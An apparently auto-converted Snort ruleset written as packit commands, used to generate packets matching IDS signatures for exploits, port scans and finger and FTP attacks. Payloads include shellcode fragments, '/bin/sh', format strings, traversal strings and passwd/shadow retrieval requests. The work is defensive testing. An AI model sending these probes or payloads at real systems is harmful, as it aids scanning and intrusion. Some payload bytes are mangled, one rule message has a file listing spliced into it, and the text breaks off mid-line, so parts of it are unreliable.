HOME_NET=0/0 EXTERNAL_NET=0/0 DNS_SERVERS=$HOME_NET SMTP_SERVERS=$HOME_NET HTTP_SERVERS=$HOME_NET SQL_SERVERS=$HOME_NET TELNET_SERVERS=$HOME_NET SNMP_SERVERS=$HOME_NET HTTP_PORTS=80 SHELLCODE_PORTS='! 80' ORACLE_PORTS=1521 AIM_SERVERS=[64.12.24.0/24,64.12.25.0/24,64.12.26.14/24,64.12.28.0/24,64.12.29.0/24,64.12.161.0/24,64.12.163.0/24,205.188.5.0/24,205.188.9.0/24] packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 0 # "BAD-TRAFFIC tcp port 0 traffic" classtype:misc-activity sid:524 packit -t TCP -d $EXTERNAL_NET -s $HOME_NET --S 0 # "BAD-TRAFFIC tcp port 0 traffic" classtype:misc-activity sid:524 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 0 # "BAD-TRAFFIC udp port 0 traffic" cve,CVE-1999-0675 nessus,10074 classtype:misc-activity sid:525 packit -t UDP -d $EXTERNAL_NET -s $HOME_NET --S 0 # "BAD-TRAFFIC udp port 0 traffic" cve,CVE-1999-0675 nessus,10074 classtype:misc-activity sid:525 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F SYN #Cannot convert: dsize:>6 "BAD-TRAFFIC data in TCP SYN packet" url,www.cert.org/incident_notes/IN-99-07.html sid:526 classtype:misc-activity packit -d 127.0.0.0/8 # "BAD-TRAFFIC loopback traffic" classtype:bad-unknown url,rr.sans.org/firewall/egress.php sid:528 packit -s 127.0.0.0/8 # "BAD-TRAFFIC loopback traffic" classtype:bad-unknown url,rr.sans.org/firewall/egress.php sid:528 packit -s $EXTERNAL_NET -d $HOME_NET # "BAD-TRAFFIC ip reserved bit set" sid:523 classtype:misc-activity #packit -s $EXTERNAL_NET -d $HOME_NET -T 0 #Cannot convert: EN-US q138268 "BAD-TRAFFIC 0 ttl" url,www.isi.edu/in-notes/rfc1122.txt url,support.microsoft.com/default.aspx?scid=kb sid:1321 classtype:misc-activity packit -s $EXTERNAL_NET -d $HOME_NET # "BAD-TRAFFIC bad frag bits" sid:1322 classtype:misc-activity packit -s $EXTERNAL_NET -d $HOME_NET -t ip_proto:>134 # "BAD-TRAFFIC Unassigned/Reserved IP protocol" url,www.iana.org/assignments/protocol-numbers classtype:non-standard-protocol sid:1627 packit -t TCP -d 232.0.0.0/8 -F SYN # "BAD-TRAFFIC syn to multicast address" classtype:bad-unknown sid:1431 packit -t TCP -d 233.0.0.0/8 -F SYN # "BAD-TRAFFIC syn to multicast address" classtype:bad-unknown sid:1431 packit -t TCP -d 239.0.0.0/8 -F SYN # "BAD-TRAFFIC syn to multicast address" classtype:bad-unknown sid:1431 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 22 -p "/bin/sh" # "EXPLOIT ssh CRC32 overflow /bin/sh" bugtraq,2347 cve,CVE-2001-0144 classtype:shellcode-detect sid:1324 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 22 -p "" # "EXPLOIT ssh CRC32 overflow NOOP" bugtraq,2347 cve,CVE-2001-0144 classtype:shellcode-detect sid:1326 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 22 -p "W" -p "˙˙˙˙" # "EXPLOIT ssh CRC32 overflow" bugtraq,2347 cve,CVE-2001-0144 classtype:shellcode-detect sid:1327 packit -t TCP -s $EXTERNAL_NET --S 80 -d $HOME_NET -p "3Éą?éQ<úG3ŔP÷ĐP" # "EXPLOIT Netscape 4.7 client overflow" cve,CVE-2000-1187 bugtraq,822 arachnids,215 classtype:attempted-user sid:283 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 2766 -p "ë#^3ŔˆFú‰Fő‰6" # "EXPLOIT nlps x86 Solaris overflow" classtype:attempted-admin sid:300 bugtraq,2319 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 515 -p "C‰[K‰C ° ̀1ŔţŔ̀č”˙˙˙/bin/sh" # "EXPLOIT LPRng overflow" cve,CVE-2000-0917 bugtraq,1712 classtype:attempted-admin sid:301 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 515 -p "XXXX%.172u%300\$n" # "EXPLOIT Redhat 7.0 lprd overflow" classtype:attempted-admin sid:302 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 6373 -p "ë]UţM˜ţM›" # "EXPLOIT SCO calserver overflow" cve,CVE-2000-0306 bugtraq,2353 classtype:attempted-admin sid:304 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 8080 -p "whois://" #Cannot convert: dsize: >1000 "EXPLOIT delegate proxy overflow" nocase-ignored arachnids,267 classtype:attempted-admin sid:305 bugtraq,808 cve,CVE-2000-0165 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 9090 -p "GET / HTTP/1.1" # "EXPLOIT VQServer admin" nocase-ignored bugtraq,1610 url,www.vqsoft.com/vq/server/docs/other/control.html cve,CAN-2000-0766 classtype:attempted-admin sid:306 packit -t TCP -s $EXTERNAL_NET --S 21 -d $HOME_NET -p "´ ´‹Ěƒé‹3Éfš" # "EXPLOIT NextFTP client overflow" bugtraq,572 cve,CVE-1999-0671 classtype:attempted-user sid:308 #packit -t TCP -s $EXTERNAL_NET -d $SMTP_SERVERS --D 25 -F ACK -p "from:" #Cannot convert: dsize: >512 "EXPLOIT sniffit overflow" nocase-ignored bugtraq,1158 cve,CAN-2000-0343 arachnids,273 classtype:attempted-admin sid:309 packit -t TCP -s $EXTERNAL_NET -d $SMTP_SERVERS --D 25 -p "ëEë [ü3Éą‚‹ó€+" # "EXPLOIT x86 windows MailMax overflow" bugtraq,2312 cve,CVE-1999-0404 classtype:attempted-admin sid:310 packit -t TCP -s $HOME_NET -d $EXTERNAL_NET --D 80 -p "3Éą?éQ<úG3ŔP÷ĐP" # "EXPLOIT Netscape 4.7 unsucessful overflow" cve,CVE-2000-1187 bugtraq,822 arachnids,214 classtype:unsuccessful-user sid:311 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 123 #Cannot convert: dsize: >128 "EXPLOIT ntpdx overflow attempt" arachnids,492 bugtraq,2540 classtype:attempted-admin sid:312 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 518 -p "č" # "EXPLOIT ntalkd x86 Linux overflow" bugtraq,210 classtype:attempted-admin sid:313 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 635 -p "^°‰ţȉF°‰F" # "EXPLOIT x86 Linux mountd overflow" cve,CVE-1999-0002 bugtraq,121 classtype:attempted-admin sid:315 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 635 -p "ëV^VVV1҈V ˆV" # "EXPLOIT x86 Linux mountd overflow" cve,CVE-1999-0002 bugtraq,121 classtype:attempted-admin sid:316 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 635 -p "ë@^1Ŕ@‰F‰Ă@‰" # "EXPLOIT x86 Linux mountd overflow" cve,CVE-1999-0002 bugtraq,121 classtype:attempted-admin sid:317 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 2224 -p "1Ű̀č[˙˙˙" # "EXPLOIT MDBMS overflow" bugtraq,1252 cve,CVE-2000-0446 classtype:attempted-admin sid:1240 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 4242 -p "˙űx˙űx˙űx˙űx" -p "@Š˙Č@‚˙Ř;6ţ;vţ" #Cannot convert: dsize:>1000 "EXPLOIT AIX pdnsd overflow" cve,CVE-1999-0745 bugtraq,3237 classtype:attempted-user sid:1261 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 4321 -p "-soa %p" # "EXPLOIT rwhoisd format string attempt" cve,CAN-2001-0838 bugtraq,3474 classtype:misc-attack sid:1323 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 6112 -p "1" -p !"000" # "EXPLOIT CDE dtspcd exploit attempt" cve,CAN-2001-0803 url,www.cert.org/advisories/CA-2002-01.html classtype:misc-attack sid:1398 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 32772:34000 -p "‡†" #Cannot convert: dsize:>720 "EXPLOIT cachefsd buffer overflow attempt" classtype:misc-attack cve,CAN-2002-0084 bugtraq,4631 sid:1751 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 749 -p "ŔŔŔŔ" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1894 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 751 -p "ŔŔŔŔ" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1895 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 749 -p "˙˙KADM0.0Aű" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1896 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 751 -p "˙˙KADM0.0Aű" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1897 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 749 -p "/shh//bi" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1898 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 751 -p "/shh//bi" # "EXPLOIT kadmind buffer overflow attempt" cve,CAN-2002-1235 url,www.kb.cert.org/vuls/id/875073 classtype:shellcode-detect sid:1899 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 22 -p "GOBBLES" # "EXPLOIT gobbles SSH exploit attempt" bugtraq,5093 classtype:misc-attack sid:1812 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 515 -p "psfile=\"\`" # "EXPLOIT LPD dvips remote command execution attempt" cve,CVE-2001-1002 nessus,11023 classtype:system-call-detect sid:1821 #packit -t TCP -s $EXTERNAL_NET --S 22 -d $HOME_NET -p "SSH-" #Cannot convert: isdataat:200,relative pcre:"/^SSH-s[^n]{200}/ism" "EXPLOIT SSH server banner overflow" nocase-ignored bugtraq,5287 classtype:misc-attack sid:1838 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 6666:7000 -p "ëK[S2äƒĂ Kˆ#¸Pw" # "EXPLOIT CHAT IRC topic overflow" cve,CVE-1999-0672 bugtraq,573 classtype:attempted-user sid:307 #packit -t TCP --D 6666:7000 -p "PRIVMSG" -p "nickserv" -p "IDENTIFY" #Cannot convert: isdataat:100,relative pcre:"/^PRIVMSGs+nickservs+IDENTIFYs[^n]{100}/smi" "EXPLOIT CHAT IRC Ettercap parse overflow attempt" nocase-ignored nocase-ignored nocase-ignored url,www.bugtraq.org/dev/GOBBLES-12.txt classtype:misc-attack sid:1382 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 139 -p "ë/_ëJ^‰ű‰>‰ň" # "EXPLOIT x86 Linux samba overflow" bugtraq,1816 cve,CVE-1999-0811 cve,CVE-1999-0182 classtype:attempted-admin sid:292 packit -t TCP -s $EXTERNAL_NET --S 10101 -d $HOME_NET -T 255 -a 0 -F SYN # "SCAN myscan" arachnids,439 classtype:attempted-recon sid:613 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 113 -p "VERSION" # "SCAN ident version request" arachnids,303 classtype:attempted-recon sid:616 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 80 -F FINSYN #Cannot convert: dsize: 0 "SCAN cybercop os probe" arachnids,146 classtype:attempted-recon sid:619 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 3128 -F SYN # "SCAN Squid Proxy attempt" classtype:attempted-recon sid:618 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 1080 -F SYN # "SCAN SOCKS Proxy attempt" url,help.undernet.org/proxyscan/ classtype:attempted-recon sid:615 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 8080 -F SYN # "SCAN Proxy Port 8080 attempt" classtype:attempted-recon sid:620 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F FIN # "SCAN FIN" arachnids,27 classtype:attempted-recon sid:621 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F SYN -q 1958810375 # "SCAN ipEye SYN scan" arachnids,236 classtype:attempted-recon sid:622 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -q 0 -a 0 # "SCAN NULL" arachnids,4 classtype:attempted-recon sid:623 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F FINSYN # "SCAN SYN FIN" arachnids,198 classtype:attempted-recon sid:624 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F ACKFINPSHSYNRSTURG # "SCAN XMAS" arachnids,144 classtype:attempted-recon sid:625 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F FINPSHURG # "SCAN nmap XMAS" arachnids,30 classtype:attempted-recon sid:1228 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F ACK -a 0 # "SCAN nmap TCP" arachnids,28 classtype:attempted-recon sid:628 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F FINPSHSYNURG # "SCAN nmap fingerprint attempt" arachnids,05 classtype:attempted-recon sid:629 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -n 39426 -F FINSYN # "SCAN synscan portscan" arachnids,441 classtype:attempted-recon sid:630 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "AAAAAAAAAAAAAAAA" -F ACKPSH # "SCAN cybercop os PA12 attempt" arachnids,149 classtype:attempted-recon sid:626 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "AAAAAAAAAAAAAAAA" -F FINSYNURG -a 0 # "SCAN cybercop os SFU12 probe" arachnids,150 classtype:attempted-recon sid:627 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 10080:10081 -p "Amanda" # "SCAN Amanda client version request" nocase-ignored classtype:attempted-recon sid:634 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 49 -p "€" # "SCAN XTACACS logout" arachnids,408 classtype:bad-unknown sid:635 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 7 -p "cybercop" # "SCAN cybercop udp bomb" arachnids,363 classtype:bad-unknown sid:636 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "helpquite" # "SCAN Webtrends Scanner UDP Probe" arachnids,308 classtype:attempted-recon sid:637 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 22 -p "Version_Mapper" # "SCAN SSH Version map attempt" nocase-ignored classtype:network-scan sid:1638 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 1900 -p "M-SEARCH " -p "ssdp:discover" # "SCAN UPnP service discover attempt" classtype:network-scan sid:1917 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "SolarWinds.Net" # "SCAN SolarWinds IP scan attempt" classtype:network-scan sid:1918 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "AAAAAAAAAAAAAAAA" -F FINPSHSYN -a 0 # "SCAN cybercop os probe" arachnids,145 classtype:attempted-recon sid:1133 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "cmd_rootsh" # "FINGER cmd_rootsh backdoor attempt" classtype:attempted-admin nessus,10070 cve,CAN-1999-0660 url,www.sans.org/y2k/TFN_toolkit.htm url,www.sans.org/y2k/fingerd.htm sid:320 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "a b c d e f" # "FINGER account enumeration attempt" nocase-ignored nessus,10788 classtype:attempted-recon sid:321 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "search" # "FINGER search query" cve,CVE-1999-0259 arachnids,375 classtype:attempted-recon sid:322 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "root" # "FINGER root query" arachnids,376 classtype:attempted-recon sid:323 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "" # "FINGER null request" arachnids,377 classtype:attempted-recon sid:324 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p ";" #Cannot convert: Can't handle escaped semicolon correctly "FINGER remote command execution attempt" cve,CVE-1999-0150 bugtraq,974 arachnids,379 classtype:attempted-user sid:326 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "|" # "FINGER remote command pipe execution attempt" cve,CVE-1999-0152 bugtraq,2220 arachnids,380 classtype:attempted-user sid:327 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "@@" # "FINGER bomb attempt" arachnids,381 cve,CAN-1999-0106 classtype:attempted-dos sid:328 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "@" # "FINGER redirection attempt" nessus,10073 arachnids,251 cve,CAN-1999-0105 classtype:attempted-recon sid:330 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p " " # "FINGER cybercop query" arachnids,132 cve,CVE-1999-0612 classtype:attempted-recon sid:331 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "0" # "FINGER 0 query" nessus,10069 arachnids,378 arachnids,131 cve,CAN-1999-0197 classtype:attempted-recon sid:332 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "." # "FINGER . query" nessus,10072 arachnids,130 cve,CAN-1999-0198 classtype:attempted-recon sid:333 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 79 -p "version" # "FINGER version query" classtype:attempted-recon sid:1541 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "CEL" #Cannot convert: isdataat:100,relative pcre:"/^CELs[^n]{100}/smi" "FTP CEL overflow attempt" nocase-ignored bugtraq,679 cve,CVE-1999-0789 arachnids,257 classtype:attempted-admin sid:337 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "CWD" #Cannot convert: isdataat:100,relative pcre:"/^CWDs[^n]{100}/smi" "FTP CWD overflow attempt" nocase-ignored cve,CAN-2000-1035 cve,CAN-2000-1194 cve,CAN-2002-0126 classtype:attempted-admin sid:1919 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "CMD" #Cannot convert: isdataat:100,relative pcre:"/^CMDs[^n]{100}/smi" "FTP CMD overflow attempt" nocase-ignored classtype:attempted-admin sid:1621 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "STAT" #Cannot convert: isdataat:100,relative pcre:"/^STATs[^n]{100}/smi" "FTP STAT overflow attempt" nocase-ignored url,labs.defcom.com/adv/2001/def-2001-31.txt classtype:attempted-admin sid:1379 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" -p "CHOWN" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+CHOWNs[^n]{100}/smi" "FTP SITE CHOWN overflow attempt" nocase-ignored nocase-ignored cve,CAN-2001-0065 classtype:attempted-admin sid:1562 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" -p "NEWER" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+NEWERs[^n]{100}/smi" "FTP SITE NEWER overflow attempt" nocase-ignored nocase-ignored cve,CVE-1999-0800 classtype:attempted-admin sid:1920 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" -p "CPWD" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+CPWDs[^n]{100}/smi" "FTP SITE CPWD overflow attempt" nocase-ignored nocase-ignored bugtraq,5427 cve,CAN-2002-0826 classtype:misc-attack sid:1888 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" -p "EXEC" -p "%" -p "%" # "FTP SITE EXEC format string attempt" nocase-ignored nocase-ignored classtype:bad-unknown sid:1971 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" #Cannot convert: isdataat:100,relative pcre:"/^SITEs[^n]{100}/smi" "FTP SITE overflow attempt" nocase-ignored cve,CAN-2001-0755 cve,CAN-2001-0770 cve,CVE-1999-0838 classtype:attempted-admin sid:1529 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "USER" #Cannot convert: Unrecognized flow type to_server,established,no_stream isdataat:100,relative pcre:"/^USERs[^n]{100}/smi" "FTP USER overflow attempt" nocase-ignored bugtraq,4638 cve,CAN-2000-0479 cve,CAN-2000-0656 cve,CAN-2000-1035 cve,CAN-2000-1194 cve,CAN-2001-0794 cve,CAN-2001-0826 cve,CAN-2002-0126 cve,CVE-2000-0943 classtype:attempted-admin sid:1734 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "PASS" #Cannot convert: Unrecognized flow type to_server,established,no_stream isdataat:100,relative pcre:"/^PASSs[^n]{100}/smi" "FTP PASS overflow attempt" nocase-ignored cve,CAN-2000-1035 cve,CAN-2002-0126 classtype:attempted-admin sid:1972 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "RMDIR" #Cannot convert: isdataat:100,relative pcre:"/^RMDIRs[^n]{100}/smi" "FTP RMDIR overflow attempt" nocase-ignored classtype:attempted-admin sid:1942 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "MKD" #Cannot convert: isdataat:100,relative pcre:"/^MKDs[^n]{100}/smi" "FTP MKD overflow attempt" nocase-ignored cve,CAN-1999-0911 bugtraq,612 classtype:attempted-admin sid:1973 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "REST" #Cannot convert: isdataat:100,relative pcre:"/^RESTs[^n]{100}/smi" "FTP REST overflow attempt" nocase-ignored cve,CAN-2001-0826 classtype:attempted-admin sid:1974 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "DELE" #Cannot convert: isdataat:100,relative pcre:"/^DELEs[^n]{100}/smi" "FTP DELE overflow attempt" nocase-ignored cve,CAN-2001-0826 classtype:attempted-admin sid:1975 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "RMD" #Cannot convert: isdataat:100,relative pcre:"/^RMDs[^n]{100}/smi" "FTP RMD overflow attempt" nocase-ignored cve,CAN-2001-0826 classtype:attempted-admin sid:1976 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "MODE" #Cannot convert: pcre:"/^MODEs+[^ABSC]{1}/msi" "FTP invalid MODE" nocase-ignored classtype:protocol-command-decode sid:1623 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "PWD" #Cannot convert: dsize:10 "FTP large PWD command" nocase-ignored classtype:protocol-command-decode sid:1624 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SYST" #Cannot convert: dsize:10 "FTP large SYST command" nocase-ignored classtype:protocol-command-decode sid:1625 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "CWD" -p "C:\" # "FTP CWD Root directory transversal attempt" nocase-ignored nessus,11677 bugtraq,7674 classtype:protocol-command-decode sid:2125 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" -p "ZIPCHK" #Cannot convert: isdataat:100,relative pcre:"/^SITEs+ZIPCHKs[^n]{100}/smi" "FTP SITE ZIPCHK overflow attempt" nocase-ignored nocase-ignored cve,CVE-2000-0040 classtype:attempted-admin sid:1921 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" -p "NEWER" #Cannot convert: pcre:"/^SITEs+NEWER/smi" "FTP SITE NEWER attempt" nocase-ignored nocase-ignored cve,CVE-1999-0880 nessus,10319 classtype:attempted-dos sid:1864 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "SITE" -p "EXEC" #Cannot convert: pcre:"/^SITEs+EXEC/smi" "FTP SITE EXEC attempt" nocase-ignored nocase-ignored bugtraq,2241 arachnids,317 classtype:bad-unknown sid:361 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "STAT" -p "*" # "FTP EXPLOIT STAT attack-responses.rules backdoor.rules bad-traffic.rules chat.rules ddos.rules deleted.rules dns.rules dos.rules experimental.rules exploit.rules finger.rules ftp.rules icmp-info.rules icmp.rules imap.rules info.rules iptables.cvs.20031124.v0.2.1 iptables.cvs.20031124.v0.2.2 iptables.cvs.20031124.v0.2.3 local.rules misc.rules multimedia.rules mysql.rules netbios.rules nntp.rules oracle.rules other-ids.rules p2p.rules packit.cvs.20031124.v0.2.2 packit.cvs.20031124.v0.2.3 policy.rules pop2.rules pop3.rules porn.rules rpc.rules rservices.rules scan.rules shellcode.rules smtp.rules snmp.rules snort-attack-responses snort-backdoor snort-bad-traffic snort-chat snort-ddos snort-deleted snort-dns snort-dos snort-exploit snort-finger snort-ftp snort-icmp snort-icmp-info snort-info snort-misc snort-multimedia snort-mysql snort-netbios snort-oracle snort-other-ids snort-p2p snort-policy snort-pop2 snort-pop3 snort-porn snort-rpc snort-rservices snort-scan snort-shellcode snort-smtp snort-snmp snort-sql snort-telnet snort-tftp snort-virus snort-web-attacks snort-web-cgi snort-web-client snort-web-coldfusion snort-web-frontpage snort-web-iis snort-web-misc snort-web-php snort-x11 snort.conf snort.conf.pristine sql.rules telnet.rules tftp.rules virus.rules web-attacks.rules web-cgi.rules web-client.rules web-coldfusion.rules web-frontpage.rules web-iis.rules web-misc.rules web-php.rules x11.rules dos attempt" nocase-ignored bugtraq,4482 classtype:attempted-dos sid:1777 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "STAT" -p "?" # "FTP EXPLOIT STAT ? dos attempt" nocase-ignored bugtraq,4482 classtype:attempted-dos sid:1778 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p " --use-compress-program" # "FTP tar parameters" nocase-ignored bugtraq,2240 arachnids,134 cve,CVE-1999-0202 classtype:bad-unknown sid:362 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "CWD" -p "~root" #Cannot convert: pcre:"/^CWDs+~root/smi" "FTP CWD ~root attempt" nocase-ignored nocase-ignored cve,CVE-1999-0082 arachnids,318 classtype:bad-unknown sid:336 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "CWD" -p "..." # "FTP CWD ..." nocase-ignored classtype:bad-unknown sid:1229 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "CWD" #Cannot convert: pcre:"/^CWDs+~/smi" "FTP CWD ~ attempt" cve,CAN-2001-0421 bugtraq,2601 classtype:denial-of-service sid:1672 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p ".%20." # "FTP serv-u directory transversal" nocase-ignored bugtraq,2052 cve,CVE-2001-0054 classtype:bad-unknown sid:360 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "~" -p "[" # "FTP wu-ftp bad file completion attempt [" cve,CVE-2001-0550 cve,CAN-2001-0886 bugtraq,3581 classtype:misc-attack sid:1377 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "~" -p "{" # "FTP wu-ftp bad file completion attempt {" cve,CVE-2001-0550 cve,CAN-2001-0886 bugtraq,3581 classtype:misc-attack sid:1378 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "%p" # "FTP format string attempt" nocase-ignored classtype:attempted-admin sid:1530 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "RNFR " -p " ././" # "FTP RNFR ././ attempt" nocase-ignored nocase-ignored classtype:misc-attack sid:1622 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 #Cannot convert: Unrecognized flow type to_server,established,no_stream dsize:>100 "FTP command overflow attempt" bugtraq,4638 classtype:protocol-command-decode sid:1748 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "LIST" -p ".." -p ".." # "FTP LIST directory traversal attempt" cve,CVE-2001-0680 bugtraq,2618 nessus,11112 classtype:protocol-command-decode sid:1992 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p ".forward" # "FTP .forward" arachnids,319 classtype:suspicious-filename-detect sid:334 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p ".rhosts" # "FTP .rhosts" arachnids,328 classtype:suspicious-filename-detect sid:335 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "authorized_keys" # "FTP authorized_keys" classtype:suspicious-filename-detect sid:1927 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "RETR" -p "passwd" # "FTP passwd retrieval attempt" nocase-ignored arachnids,213 classtype:suspicious-filename-detect sid:356 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "RETR" -p "shadow" # "FTP shadow retrieval attempt" nocase-ignored classtype:suspicious-filename-detect sid:1928 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "USER" -p "w0rm" #Cannot convert: pcre:"/^USERs+w0rm/smi" "FTP ADMw0rm ftp login attempt" nocase-ignored nocase-ignored arachnids,01 sid:144 classtype:suspicious-login packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "PASS ddd@" # "FTP adm scan" arachnids,332 classtype:suspicious-login sid:353 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "pass -iss@iss" # "FTP iss scan" arachnids,331 classtype:suspicious-login sid:354 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "pass wh00t" # "FTP pass wh00t" nocase-ignored arachnids,324 classtype:suspicious-login sid:355 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "pass -cklaus" # 